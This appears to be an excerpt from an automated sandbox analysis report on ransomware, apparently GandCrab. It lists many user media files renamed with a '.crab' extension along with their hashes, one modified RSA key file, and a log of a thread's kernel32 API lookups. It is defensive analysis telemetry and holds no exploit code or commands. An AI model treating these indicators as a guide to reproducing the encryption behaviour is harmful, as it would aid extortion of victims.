SHA1: acbb3d0163ef2923eec145659a915968ce56f72f
SHA256: c9cece4f307bb5de6a489aa72b32179d2d16f1f52d1a850526b1a918b8f7dffa
False
c:\users\5p5nrgjn0js halpmcxz\music\mjirmot4cohec3fu.m4a.crab 56.30 KB MD5: b21c925bd7139438b2add531d2b797ab
SHA1: d0a287c3e6d8bf61f2de366a9cede69e8b8a0605
SHA256: 657fdd99bd7cac1caf3e7420f3946f8616739dead64abaefad4a93c0100e8d63
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\c94j9nmhprafustnat.m4a.crab 29.74 KB MD5: c07a10b6da78e3e2b8023edf192e5c7f
SHA1: 353ff0a59177afcf2d262982a446df164e3a007b
SHA256: 5f0644a8326bbf458ef187adbd0da274261d84f0062cc7f54117287c0eea1ff0
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\-nfnejge5.m4a.crab 86.66 KB MD5: e9e54ea2c3fd81f785b7446b342e5e17
SHA1: 66f32481d0d37fe2e7e3093eb49773578a020e51
SHA256: 3031c9f2d67f1ba1444d01d97cd4cbf94c5974f230f4c3acbec7bf7cf7b2944d
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\-qfj4endv5.m4a.crab 87.99 KB MD5: 2de005a701a128dd518fcd838af796af
SHA1: 9081aef4ce18a50254ae9334be522401d801f097
SHA256: 4df06896aa56240405c6a60f0efdd9f3722c57b16e0190f6dabb5ec1bcc4c058
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\2crmfqu.mp3.crab 36.98 KB MD5: e259e41226c7642cd49485997f957336
SHA1: e085d2dcc70b7e20ca842dafc251921c5fe9545a
SHA256: af2476f4a59235962d0d91c1cae651c5fbec4b527ae2ff0c3d5c6f9bea9973d3
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\cpi6o60qv.m4a.crab 50.88 KB MD5: fddd6d14b6912c19b40d4cd42fc6845c
SHA1: 4f0cdc23b6cec77a642562dceaf70de844bb7f42
SHA256: a0fd728663bbd98bb7600450745407f30e1b5ec23a25c9c589fe1adce39d9d5d
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\khvpwza8qwlllf9rsz5.wav.crab 18.68 KB MD5: b593a406a8183e838056d8a14c73ca3e
SHA1: 8ba9cf361a7ea7c1d58f943848b3280a6824efe6
SHA256: 825026ea1ae22b4add623fae59777d0baeaa5200f4812e2f73c2d5a69adc7dcf
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\ntusvjkocwdjwyru7.mp3.crab 58.91 KB MD5: ef434a5abb56ef2ecde469217d7c45a8
SHA1: de2e60818f47ee31edb68d999121042b6318ebe2
SHA256: bf1d3b0469237996ef275abab2df6e234149c8775cb8621f50b5fcf3cf9a6727
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\t c9d3.wav.crab 45.90 KB MD5: 4f93c986ee5cb755dd3c15dac45dbfd0
SHA1: 2a268148acff9c8630cca21013e6f29e7069779d
SHA256: 00263c6ad4873fdc2ee4d9008bd582051a8d3ddc46b40362d6033ddb0a5701a3
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\0ds3.wav.crab 76.51 KB MD5: b18a1136739081184efb081503e05fa2
SHA1: a47723cd076655e459bf85ff491d067a2bd4d8bd
SHA256: 5002b68fce1a1507e964639753817cb92e70713137f3ef2c04be88c66204aa8c
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\3qpftzi8npnaxry.wav.crab 27.13 KB MD5: ab3d83f1a206fc59bc4003581764394e
SHA1: 1f99b1faba5302945e3bdf13bb15e78910b77677
SHA256: aee592b3dbe17b0db36b7e205fce9d94bf9e5b692550b563df3f8e76260e5143
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\adu2bqh8f.mp3.crab 24.65 KB MD5: 429b4561e54391d47541af04b26ee51c
SHA1: d586e9bb00e67c4e692079d2160fcdb42d33e3a4
SHA256: e592afeb86518c597f6f43f55caca3761a30342fff8d7edf0d8cbf7de6358770
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\fxemvakcdnj1x.mp3.crab 57.24 KB MD5: 09e72b725042e5daaaf7ea81cdc393d2
SHA1: 34bd3cadec0db51f46da05ffc222863248384c83
SHA256: c9d8bffae4ecaefc9dceace6dac05814ab86a5254a3599bc6aa9e269a0810e62
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\rbv5cx3xmx.mp3.crab 49.45 KB MD5: 5b115949b61fc40efc898b67e901c1e0
SHA1: aac71bd354574ee1f245410a7f1255e5383f104a
SHA256: f6f497089ae99f93ec2c857415a6c61da0362654cb01e364a8750a7809c83c8e
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\rdsg2e5.wav.crab 93.13 KB MD5: e81fe2f66cb03f98fbb2a7d2cd881eff
SHA1: b4a7c8f6e9697e261dc8c2a13c2ade8f2c720c19
SHA256: a6593da618372675c2ac4f3ec4fba036b77f4c79eac065d83b340ff3b60c8058
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\x0vr.m4a.crab 68.65 KB MD5: ae7e9c4817cc6badb6c9ca5910668c25
SHA1: 51039857fb1d507787ac60cf211bc36a6625bb1b
SHA256: 88628e8f6718ee80c95e3648a7b5c8c4757c8841d51ae2ff31def8de1a7bfb86
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\1onm- n_x9gcx_j\gmfigcxzisicjvnz.mp3.crab 23.29 KB MD5: 0ece0aa5f1e04918a59a81903955bc9a
SHA1: 7bcf54e7b583c71dd15d31219352799e0b202fb2
SHA256: 3ba074759c45e18776eca62b513c6e09b5352a79b7787faeedbf130f7efe9ad1
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\1onm- n_x9gcx_j\ntlixq.m4a.crab 88.26 KB MD5: ae239349e8a229d3e882f1cc587af5e8
SHA1: 65886b464092635f14df45c0722beffb3843c64a
SHA256: d7ba7fc42aa8552c4e873b6284e9f487eec34ae98b503455c38edd5aee990aae
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\7vzld80gbo4j.mp3.crab 7.21 KB MD5: bfba1e5ee599e9a6838797413283da3b
SHA1: 5274f725b18cac775f89da078ba3aa6a54dbcb84
SHA256: 788c0c3bab118e277d116ff5cc8428f32ad0cea5585f2ad8c9c139deb4c9b416
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\foy0yh.m4a.crab 9.73 KB MD5: 8e4178613de4e9ce3b23d1c114b7e7f8
SHA1: dbe2a1ae86d8a9d9dd877d21a820212d5f5441f3
SHA256: 65020f8e64a5509ddafd03eafbe5a39f3cbbc094fa8030ca712f54419e09fea1
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\k6kjtr3ydhqi3zav.mp3.crab 8.41 KB MD5: 6670ebf15c3e1b970826af3d430f561b
SHA1: 114bed7ec9eb190cbbfdaca95b7db4527bfafb3d
SHA256: 15ddee3c61c44dd423f342a2d4e04573a4b3d4991a79ee9ae93d24531f25a26c
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\pp2s8u.m4a.crab 8.12 KB MD5: d47371fdbe86e7796e7c73daf00fc356
SHA1: 2c92875bb0cddb5631388b31e57e8c621460286b
SHA256: 6337657e7c26ba953fb8c0b0ce237fc7190fb0879ee7394a62b22637d21bbf99
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\zab3b7u sn4.m4a.crab 25.88 KB MD5: 6538acfd1f79f8dca05d6747f0c197b1
SHA1: fd3bd7126e91c8c402e3d50ac47af3dbf2a99731
SHA256: 897157eac2c8c2b924303fc153a64bf645244f3d9eef9d95e8966c7ae4a50881
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\_wm2uinrr7.wav.crab 80.12 KB MD5: cd66f75b290d85e51e5d1cbadb9f5920
SHA1: 12a875c65f069cf8382d09dc2e03d6fcfbbfbeb9
SHA256: 89d38df489d9b16a61acd4cd8cd5a9db909787b7cbbcdcb8c85997d58ef2f661
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\cqcu.mp3.crab 38.74 KB MD5: b3f81e1a5f970780cb643758ce1ee255
SHA1: 829c42ba779230ec97723e790a781a8b7addacc8
SHA256: 0cbbfec0432fa61758f72ac11ae368e934b3e0bbb3a67c09a504a5cca65cd831
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\g-jrmnm_nqgjtqyvesv.wav.crab 38.43 KB MD5: f650f44280369bd327f72cb62cd5cad8
SHA1: dea99f2ed84bdb229b3b1eab5510ed0c45d1adfb
SHA256: 3358635d5c8428b835c2c13ed4b3ca1e43309e8f1259e15ddd0d6bde9210b086
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\tvaj5naf9xf.mp3.crab 90.99 KB MD5: 07a48172e99d408e9504524c8b1412d2
SHA1: 33bbf148e93a6374e500db3b8b46197e595704bd
SHA256: 66d035c8edb6b5b9e7c450f3fda25264cb08e8692aa26d1aa72609bd5404791a
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\vvfu7-c\lspj23a.m4a.crab 82.55 KB MD5: 3db779210ba176035b9b9db1a3a3150a
SHA1: 6985dde31158f1584ecf19c025f632ae4eb47b00
SHA256: 319c2c3be5391971dec478d19d5dfaa582a347610ee294afb55356441aaac115
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\vvfu7-c\vgllbhsrwiu5n0yn8c8.mp3.crab 54.85 KB MD5: 831063ed358dd0409e2ab41d7e8ec17e
SHA1: 19002def53aef208ec86266db60d21e80ea2e04a
SHA256: a5ce6cf392ef262995ce3c4fca72689dc7bfdb0bed1d964e362cb24fe9a1425b
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\fjgqshfegk-a.wav.crab 84.29 KB MD5: fbf7f253444eb6964b815cdc212878f3
SHA1: 95bcbc78d5a363e4533c9a164601b07dad412b8c
SHA256: bc1f2750ad3b17638eab84a4b1c657ff8f752e751291847f39ab35a60db1ed67
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\pl4n zcq2fe9n.m4a.crab 68.45 KB MD5: 0a053ddf86eeb8bcfaac48c108632fda
SHA1: 8e309260c665db44579989526004b3d03fd6f095
SHA256: aa13922b2d6b1199836929d4a4248775bca69b24bc656bd0490be15409ab3cc1
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\gz6qf6haibch0stzyw.m4a.crab 93.59 KB MD5: 13202037bf10515810934c67f58a1cab
SHA1: 5d0634fb5708c986de799b52e05cfe69c5408794
SHA256: adad2a667e27aab15f75fc27d6975cc7854b080c316f883d8d06067a3eedceda
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\paz3fuupbscnqa.mp3.crab 49.70 KB MD5: eb42b7a0f02b7b4a7e386bdbffec3c69
SHA1: 6b5d1c60fcc47d650335bf5c9800cfe7dd4e44d1
SHA256: a0dcb0b9071aa846634882fa9db67b845360aa28d2a28b99ae3160ed043b1389
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\vk99f3lkw-ydi.m4a.crab 74.74 KB MD5: 4aebce1b1a8ea37bee49631cde682ea7
SHA1: 9702074bdc076ee4b1c6519091f1085f31108a29
SHA256: 0115bae74d9909aa7272669e759cb8de4f0b568cbbb9aef3d1f757416298445d
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\ztrhl.mp3.crab 85.26 KB MD5: c5db211db973e75d67a9ed4e115bf155
SHA1: 9681101d50caa7b2ef3747a7ad16ce0b0a7a31cb
SHA256: b125f7479312c147f8947cb3233be6630750ccdc66702cf4deb63bf8619d6ad5
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\mxyrqw-lqfo.mp3.crab 35.15 KB MD5: 41c1fc22c9adb486ce6c79c4522537ce
SHA1: eb6386b8ffdf2c5a895a30aadeb76b836878a280
SHA256: 4540b5638ddb95efa69ac45f45befb1a149ea9d9659c4f6a50186ad7824d3d47
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\xmth_q.mp3.crab 82.07 KB MD5: 2f733d0289fd89262c17d2cbe1658b20
SHA1: dc2f6f06e9008fe4fa0be905918a89e36537aa66
SHA256: 2801d3633dcddf60084f99d6a178e455152b0d53f887506a862b36587c463c18
False
c:\users\5p5nrgjn0js halpmcxz\music\w6_9p6vwt-xf c-flu.m4a.crab 8.37 KB MD5: 0cd422a8afa082e2d2c44f2ea94e82bb
SHA1: 0d7006f2a73e2f93af6f953ffb07be8dd776e19d
SHA256: 82df4e1898468a4f2e3086d960273d59cd2119392fcb352a08d01d10f14c0859
False
c:\users\5p5nrgjn0js halpmcxz\music\wkktgnmukkcle0epu.mp3.crab 95.52 KB MD5: 2049a20800cbefafa7940f4650f27aec
SHA1: f742bad52a010492c217f4e6f3c7b2a37249960c
SHA256: 7d1ae092bb2b92450245fd66e731e55ede08066a23dcc18c6cd2988b1a32b5f5
False
c:\users\5p5nrgjn0js halpmcxz\ntuser.ini.crab 0.54 KB MD5: 0f0829ea5b36771fc790f46e41c27a1e
SHA1: 9dbc8c229e0b9564337f39c1edd8400b1f811043
SHA256: 6cab7653cc3ae8850d2788db1267eda94c41fab5e9c7ff9a9cb9f282183c2a9e
False
c:\users\5p5nrgjn0js halpmcxz\pictures\-tve9f.gif.crab 79.30 KB MD5: 188c8f5ec13da3b2587c50a30a88e572
SHA1: 059170592f33ffe9b98001bd9f31cd94ee5860a8
SHA256: 2200df7e573f264812bddf68c07a4ca122df33dd6c3e34365e1217a14d85af30
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\2vidpacu 9yeg2dvw.gif.crab 58.32 KB MD5: b61eb57dc2cb0ce21c89e3631559355a
SHA1: e5b6016c12445b89486752ae961fd56bddb49995
SHA256: 4536247aa3c6f208775fab225375efc3a8df571fefa18dfc9f52170cd2492dee
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\3mqoykdku3e6f.bmp.crab 8.90 KB MD5: d4bfc134f6a66f62b6c782121a94bbb8
SHA1: 860165164404ffe956edc1ebd686dfa682baa628
SHA256: 24d75ba5d5ff80a50ffacbf0d53fbf2fa539a33e7eeab599e1863427c7f36f83
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\accs5ax.gif.crab 69.95 KB MD5: 71e0fc9a7644355552f8faeeeac4723a
SHA1: f348018531c5ab2103db8df413b9b8c6ed43c4a2
SHA256: f43ca05cafe7c12414a15f3e1b0627664f0e4652c378654603d6c2987c377689
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\jkt1f.gif.crab 32.82 KB MD5: 4c4223e2c350b61faeec7d846e48e092
SHA1: 73e6ccc236578c948d51ee5e022652d9ca4fa08a
SHA256: 22ab5da1f3b08a9ebf3c704837d7a7ea202f1973ad25460170fd3c667fa6f8c8
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\m8z7p0uvyrd.jpg.crab 11.09 KB MD5: 95e0fb7a2512dfcc2c011f0a21c9044f
SHA1: 9af0149a4c065b8f44fba1ed1bec978d96102f7c
SHA256: 4d341960183eaa83f8f1663d4657069645f3c0cdad6cddd586dc50d5f1b948b0
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\pqs4yaj1ihqnb.bmp.crab 23.54 KB MD5: 08ea24aabfc8cd30fd53792aa0dfaed6
SHA1: 995f9230e6476bdd27108d87bd568d00a1d3344f
SHA256: f1b39e85f476370ff613e15ede4604bf311875b1d69fe550ec1a7955d7f62ae0
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\uju1tvt_z7h_8jrqa1.jpg.crab 62.79 KB MD5: 54323b7a7a18e31fadde4f5219664ebd
SHA1: b39f306e04e47c4ae02edd097dbeec67eda18889
SHA256: 0eba9ffb4a6458a8f811b375f2296ae4078bf383cbe572bd16f5916c752a0c31
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\ygl_pvkgm4m -9vru.bmp.crab 18.46 KB MD5: 7fd0c6a3cf2345a828df75576912d9e5
SHA1: 60601bef3b1fe77c7d89484f2107c4aa653b0bc0
SHA256: 939544f2e6307f03fe579ace02df10503ddefc1b6638f4c73c9672cdfe793645
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\9f_qs.gif.crab 25.63 KB MD5: 7480f54d57f040ce3cb6a95ccaebeb26
SHA1: 5bb7217c9ec79c7130b75ee9f316bc0109de8b1a
SHA256: 8b567320b49fc9f07a0139ded0603cfa61842889782f9b5cf7ac24f8c1bb3e0f
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\iychkcfbo-k42lq8.jpg.crab 94.91 KB MD5: da37a78b79f2b5cb656924bb9a30125f
SHA1: aaef7ec5f9e651fafa66623e939e8d447d3353fe
SHA256: 6cfa97d86c8899d4786fe6f6110014996753afd652e40cc804b2492cc6c1f227
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\lwu4_og.png.crab 84.13 KB MD5: 5985f616e66a6bbd9f0ea25cbf04117b
SHA1: 5d9b2aa75c1dce0dc1c25ccea4c3d4a2b75e9a08
SHA256: 8ba784563990f21cc7ec5be1b9ab8664f3a8d3fe6cb1006c9aa1765dc7fa8b91
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\n_ymz48xpzse76vsxy.bmp.crab 12.62 KB MD5: 9e08cec4e44a745d7f3a9fbcdcc1e2a1
SHA1: f660e68eef2f51e16189694ff9289818ddf1225e
SHA256: 199eb810a4a782bae424de3f55c2f9693634f67cabf67f5ada1677a2547237cb
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\rwsrbz2742.jpg.crab 6.05 KB MD5: 6c2625c405d2f0cf5b7e0102bd6f8d27
SHA1: b7634fe8b0d7f82a2afca9ef96e6a38e59950307
SHA256: 6e74ad83a940328daea8c34e56b7dc562307978d604589f82095b2c976207cda
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\ta-canrz9cv-gr.gif.crab 42.96 KB MD5: 745c049cf045561320d6d46e112b4f2f
SHA1: 9d9dfcf612c9933c108cb38a7dc078fc569f9688
SHA256: e215ded856c9d0f2f58546cc4966fb20270f539a464f2fafd15d29b43a8d63c9
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\u72gnwdfp5.bmp.crab 94.35 KB MD5: 5936c0393dffcfdefd51c6b3ec0b5d19
SHA1: 7d3d5884531b130bba5a761bb9a213067ed0054a
SHA256: 14e7de5d29b8218550a8915267f3c4e1ecf1889f3960eece396bb951185c5127
False
c:\users\5p5nrgjn0js halpmcxz\pictures\9yfx78p3pzej.gif.crab 51.79 KB MD5: 29b95817c3abe8e1ec9e3823bb0df40a
SHA1: 9c825328e19d36e89238082ec08b66611750aaae
SHA256: a5d4b53a52e940a67c680801acfe06abb41637108e0bf3533ccc2fb0ebcc26f7
False
c:\users\5p5nrgjn0js halpmcxz\pictures\av8nexdgw.png.crab 24.15 KB MD5: 48f95e58a5de71d2d631f6d8ffcac236
SHA1: 9c6e15efc1034c95e47017f0d406fa4a9e035044
SHA256: 6c86c6b1f802d1b76f054f8de2df002aafb46c89a91187a8ad228587e0afa684
False
c:\users\5p5nrgjn0js halpmcxz\pictures\dlup7nguzfkm.bmp.crab 56.27 KB MD5: 3f5dc54607846dfcf3e94c4737dad8ed
SHA1: 5ddce02ad2083926e982c869191ca5c18c0f99a9
SHA256: 45d26bb0cce46408b57a7057114076758a8d236e3f300ca17243177d137e9b0e
False
c:\users\5p5nrgjn0js halpmcxz\pictures\nioxokjw1gjl.png.crab 29.46 KB MD5: e305a12d4ddfafaf4cbcabafb737e1e6
SHA1: cc1d03f7cdbae39bf74d73c2e2522948a804af7c
SHA256: debcc97b560554a2f01d8b6081267747a32ff81947579e3b2d5a070e5917b05c
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\8fz7awe3ry9cqpnp_co\hllb7htbfja_5zvc.jpg.crab 83.82 KB MD5: 4ae728be9cdfa7f7b35a3a9a49be3e0f
SHA1: 5b13697c4d3d0371300045669dd5a35dd2a45936
SHA256: e74fd7b64dfa9d1f3728c51f554b468f5891dd8c8b678eb19f75e6de25a650e3
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\8fz7awe3ry9cqpnp_co\ilgvllw.gif.crab 57.80 KB MD5: 026e9bee62c5c2ad3c860f72c87b574b
SHA1: 13be0165650234e7563a3f8561bf5de085dee436
SHA256: 791d60c0873414ebec8ee28e0f0db9bc215e08d52a242ecd93ab4306a10baf8f
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\epmebyjivitzf6o.gif.crab 67.30 KB MD5: 73cfa04374c2745be3c989a9cf4e186d
SHA1: 9ea13ed6be6894a1963281997522ada2bccd1607
SHA256: 370cdc9091a758dc09cef30a8e84365153af26bc6196c15cf648ed92cef7ee35
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\jdybdm.gif.crab 53.21 KB MD5: bf9883210dfa487f75b6573b355ab14e
SHA1: 71d1e1098eef0d769a181416743faac107b37706
SHA256: c16c861be363b61fe40f9c25e9a7cf528e074e44ed0bacd077392ae124b96d6c
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\3wnok7lguniejo.bmp.crab 18.02 KB MD5: 9adc8bc97463900620f95b6d73337713
SHA1: af266aecbee1844103f8ab36e77bd02b4b12401e
SHA256: 8d4f365bbd77f9afbe380a887103cdaa9ec202b64542ab584c6b23c14b197591
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\bxzv cr.png.crab 93.79 KB MD5: 933ab24b3b87861bdd4000230dc5b841
SHA1: 4cf16b94ecfcc763d61be6f84269b516c479269b
SHA256: 80465054fdb0a681f81995377e6e8eecfdc1e4126166baa25b12a6ac871c5c78
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\cxd-mrra.gif.crab 94.79 KB MD5: 043417027f5fa522350564337505c4ea
SHA1: e4e9e519f6f66dc1b76df66e1b5b4546bc1635a8
SHA256: 622f6601b5e59019ece2e9a79e120c4b80731ea9c4355532233a6ec27d2fc2f7
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\6jbor gv.jpg.crab 55.01 KB MD5: 8407ee7f0f434e9cf2f50db9dd944cae
SHA1: 71b0a068c10eca1dfdcf6d28566c0bb3defef23a
SHA256: ff306bde661d2f5368e270332f2ed6802975ff413d6662136dad03ae60e4722e
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\fttulqqe.bmp.crab 59.85 KB MD5: 506ba15544411c7c0b98260cd85b0e82
SHA1: b8d40ed04c5da420dca5211a98eeac108c780451
SHA256: 5c3c7373cfde74560cee3da27a002f6b90d3bc3f1926de33419bdda5df3ba1b9
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\u09d7fr4ishqnbda.gif.crab 60.73 KB MD5: a474039acd215e9731118342f1d3f21e
SHA1: 0053a90e33587bbb6d8ad53c99a87e8250bcaf24
SHA256: e19c66c8b7f140ae4b9db389aca6e93fec23375f4861c97f2906a221b31605dc
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\j7 4uy.png.crab 24.70 KB MD5: a6a7e554c10ca569d421c1e55a84e49c
SHA1: 83744483fdbce520eb9e41b890f7ea281cdf1c30
SHA256: ad76297e7d960de4f567a9a6677557e5e595f49d6b747a870f1ce1e7f869e9e9
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\jluw_zq5f\-3dbjl.png.crab 79.71 KB MD5: 064c090eb88660f2e0b595f18ef26165
SHA1: b105731597c2508055c30e48ae44825e21a5da40
SHA256: d34d2bed468fd08d0badbc9af7ee8c9b5d87ecee7bd438e9836c44f0b9ab91a5
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\jluw_zq5f\58xcgtwf cs3st.png.crab 4.26 KB MD5: 4d351eca14da1e9d35a23906d87046da
SHA1: 1dcfcbbfa11cc946aa219da17801a16cc474e82f
SHA256: 080420262dcff653a6373d092e53af3b8a004efa416c027fd58605569f374d07
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f 0.05 KB MD5: 0d7db7ff842f89a36b58fa2541de2a6c
SHA1: 50f3b486f99fb22648d26870e7a5cba01caed3da
SHA256: 140eda45fe001c0fe47edd7fc509ff1882d46fbcb7c7437d893c1fb83012e433
False
Threads
Thread 0xad8
397 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:41 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fe4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fe359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fe1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fe4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fe4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7606410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76064195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fed31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ffee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77e7441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77e9c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77e9c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fff088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77e805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77e9ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77e50b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77f0fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77ea1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76064761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7605cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
